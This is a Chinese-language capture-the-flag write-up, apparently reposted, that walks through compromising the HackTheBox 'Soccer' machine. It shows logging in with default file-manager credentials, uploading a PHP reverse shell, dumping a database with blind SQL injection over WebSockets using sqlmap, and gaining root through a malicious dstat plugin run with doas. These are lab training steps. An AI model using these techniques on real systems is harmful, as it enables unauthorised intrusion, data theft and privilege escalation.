HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

这篇具有很好参考价值的文章主要介绍了HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

靶机网址:

https://app.hackthebox.com/machines/Precious

枚举

使用nmap枚举靶机

nmap -sC -sV 10.10.11.194

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

机子开放了22,80和9091端口,我们本地dns解析这个域名

echo "10.10.11.194 soccer.htb" >> /etc/hosts

然后fuzz网站根目录

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 100 -mc 200,301 -u http://soccer.htb/FUZZ

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

扫到一个目录,去网站上看看

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

看起来这是一个后台的登录页面,这个后台的框架名叫Tiny File Manager,在github上是开源的

https://github.com/prasathmani/tinyfilemanager

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

在这下面可以看到默认的用户名和密码,我们登录试试

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

登录后是一个文件上传的页面,我试了一下,发现可以上传文件的目录为/tiny/uploads

进入到这个目录,点击右上角的upload上传rev shell

我使用的rev shell:

https://pentestmonkey.net/tools/web-shells/php-reverse-shell

需要更改ip和port参数

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

然后nc监听这个端口,回到网页上传文件

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

上传成功后点击这个图标访问rev shell

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

成功获得交互shell

现在使用linpeas脚本搜集主机信息

https://github.com/carlospolop/PEASS-ng/releases/tag/20221218
chmod +x linpeas.sh
./linpeas.sh

通过这个脚本,在这台机子上发现了很多漏洞,但是都用不了,应该是打补丁了

在下面,脚本列出的nginx默认配置里发现了一个子域名

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

我们本地dns解析这个域名

echo "10.10.11.194 soc-player.soccer.htb" >> /etc/hosts

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

通过WebSockets进行SQL注入

现在访问这个域名

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

发现左上角有一个注册模块,我们注册一个账号

然后登录

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

登录后就会跳转到这个页面

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

似乎是要检查我们的票证,通过查看这个页面的源代码,可以发现突破点

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

它使用的是WebSockets,然后将我们输入的发送到这个URL “ws://soc-player.soccer.htb:9001”

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

这里告诉我们,传递的参数为id,一会sql测试的时候需要用到它

现在需要通过WebSockets进行SQL注入测试,通过google,找到了这篇文章

https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

我们将这个代码复制下来,新建一个python文件,并粘贴进去

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

根据那个网页源代码,修改ws_server和data参数

然后安装websocket模块

pip3 install websocket-client

安装完成后运行脚本

python3 web_socket.py

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

现在使用sqlmap进行测试

sqlmap -u http://localhost:8081/?id=1 --dump-all --exclude-sysdbs
--dump-all:查找并转储找到的所有数据库
--exclude-sysdbs:不会在默认数据库上浪费时间

因为是时间盲注,所以需要等待几十分钟

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

现在得到用户名和密码了,使用ssh登录即可

ssh player@10.10.11.194

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

根据之前linpeas脚本搜集到的信息,发现doas程序有suid权限,doas也不是默认安装的程序,根据HTB机子的规律,这个程序多半是突破点了

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

什么是Doas

https://zh.m.wikipedia.org/zh-hans/Doas

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

简单来说,Doas是一个与Sudo具有相同功能的软件

寻找doas软件的配置

find / -type f -name doas.conf 2>/dev/null

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

提示允许用户player用dstat使用root

Dstat插件

通过查看dstat程序的官方文档,发现我们可以编写插件并执行,名称必须为dstat_*.py,插件存放的目录为/usr/local/share/dstat/

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

我们可以往插件里写入rev shell获得root权限

我们移动到这个目录下,创建一个名为dstat_baimao.py的文件

cd /usr/local/share/dstat/
touch dstat_baimao.py
chmod 777 dstat_baimao.py

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

写入代码

import subprocess

subprocess.run(["bash"]) 
#启动一个新的 bash shell

然后使用Doas执行Dstat插件

doas /usr/bin/dstat --baimao

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权

成功获得root权限

HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权文章来源地址https://www.toymoban.com/news/detail-411882.html

到了这里,关于HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 渗透测试模拟(使用sqlmap进行sql注入漏洞判断,利用该漏洞进行挂马)

    环境:对某网站进行渗透测试。 (PHP+Mysql开发的网站,用于WEB漏洞教学和检测的) 工具:sqlmap(Kali Linux中自带or官网下载Windows版) 此次实验所涉及的sqlmap参数: 一、信息收集 二、漏洞挖掘 (1)判断网站是否存在sql注入漏洞 使用工具,sqlmap: sqlmap -u \\\"目标网站地址\\\" --ba

    2024年02月15日
    浏览(44)
  • 网络安全:Kali Linux 进行SQL注入与XSS漏洞利用

    目录 一、实验 1.环境 2.Kali Linux 进行SQL注入 3.Kali Linux 进行XSS漏洞利用 二、问题 1.XSS分类 2.如何修改beef-xss的密码 3.beef-xss 服务如何管理 4.运行beef报错 5.beef 命令的颜色有哪些区别 6.owasp-top-10 有哪些变化 (1)主机 表1  主机 系统 版本 IP 备注 Kali Linux 2022.4 192.168.204.154(动态

    2024年04月26日
    浏览(37)
  • 使用Burp Suite和Python进行自动化漏洞挖掘—SQL测试注入插件

    每次测注入都是用burp的Intruder模块,很不方便就是批量跑批量测哪些没有过滤 懒人鹅上线,准备搞一个sql测试的插件 本篇文章代码量大,基础可以去看上一篇 测试sql基本注入的载荷,在可能有sql注入的地方发送测试包,目前只测试url中的,并可以根据错误回显判断出数据库

    2024年02月09日
    浏览(42)
  • 【Sql Server】通过Sql语句批量处理数据,使用变量且遍历数据进行逻辑处理

    欢迎来到《小5讲堂》,大家好,我是全栈小5。 这是《Sql Server》系列文章,每篇文章将以博主理解的角度展开讲解, 特别是针对知识点的概念进行叙说,大部分文章将会对这些概念进行实际例子验证,以此达到加深对知识点的理解和掌握。 温馨提示:博主能力有限,理解水

    2024年03月15日
    浏览(45)
  • 【微软】【ICLR 2022】TAPEX:通过学习神经 SQL 执行器进行表预训练

    重磅推荐专栏: 《大模型AIGC》;《课程大纲》 本专栏致力于探索和讨论当今最前沿的技术趋势和应用领域,包括但不限于ChatGPT和Stable Diffusion等。我们将深入研究大型模型的开发和应用,以及与之相关的人工智能生成内容(AIGC)技术。通过深入的技术解析和实践经验分享,

    2024年02月05日
    浏览(37)
  • 【SQL开发实战技巧】系列(二十七):数仓报表场景☞通过对移动范围进行聚集来详解分析函数开窗原理以及如何一个SQL打印九九乘法表

    【SQL开发实战技巧】系列(一):关于SQL不得不说的那些事 【SQL开发实战技巧】系列(二):简单单表查询 【SQL开发实战技巧】系列(三):SQL排序的那些事 【SQL开发实战技巧】系列(四):从执行计划讨论UNION ALL与空字符串UNION与OR的使用注意事项 【SQL开发实战技巧】系列

    2023年04月09日
    浏览(48)
  • SQL注入(1)--判断是否存在SQL注入漏洞

    不论是学习后端开发/数据库/网络安全,SQL注入安全隐患反复被提起 到底什么是SQL? 维基百科的定义: (1)什么是SQL? SQL是用来操控数据库的语言 (2)举一个例子,现在我们要查询电影“长津湖”的票房数据: 先想象一下开发人员是如何书写代码从数据库中拿到数据的:

    2024年02月05日
    浏览(45)
  • SQL注入的一些示例及解决SQL注入的方法

    SQL注入是一种常见的网络攻击手段,攻击者通过把SQL命令插入到Web表单提交或输入框后面,盗取数据库信息,甚至控制数据库服务器。解决SQL注入的方法如下: 1、使用参数化查询: 参数化查询是一种预编译查询,该查询将参数和SQL语句分开,从而允许程序将参数值与SQL语句

    2023年04月09日
    浏览(40)
  • SQL注入之WHERE 子句中的 SQL 注入漏洞

    ● 实验室要求 此实验室在产品类别筛选器中包含 SQL 注入漏洞。当用户选择类别时,应用程序将执行如下所示的 SQL 查询: 若要解决实验室问题,请执行 SQL 注入攻击,使应用程序显示任何类别(已发布和未发布)中所有产品的详细信息。 ● 必要知识点 一个没有安全概念的

    2024年02月14日
    浏览(44)
  • 什么是SQL注入攻击,解释如何防范SQL注入攻击?

    SQL注入攻击是一种常见的网络攻击方式,攻击者通过在Web应用程序的查询语句中插入恶意代码,从而获取数据库中的敏感信息或者执行其他恶意操作。 为了防范SQL注入攻击,可以采取以下措施: 使用参数化查询:使用参数化查询可以避免攻击者通过查询语句中的参数注入恶

    2024年02月10日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包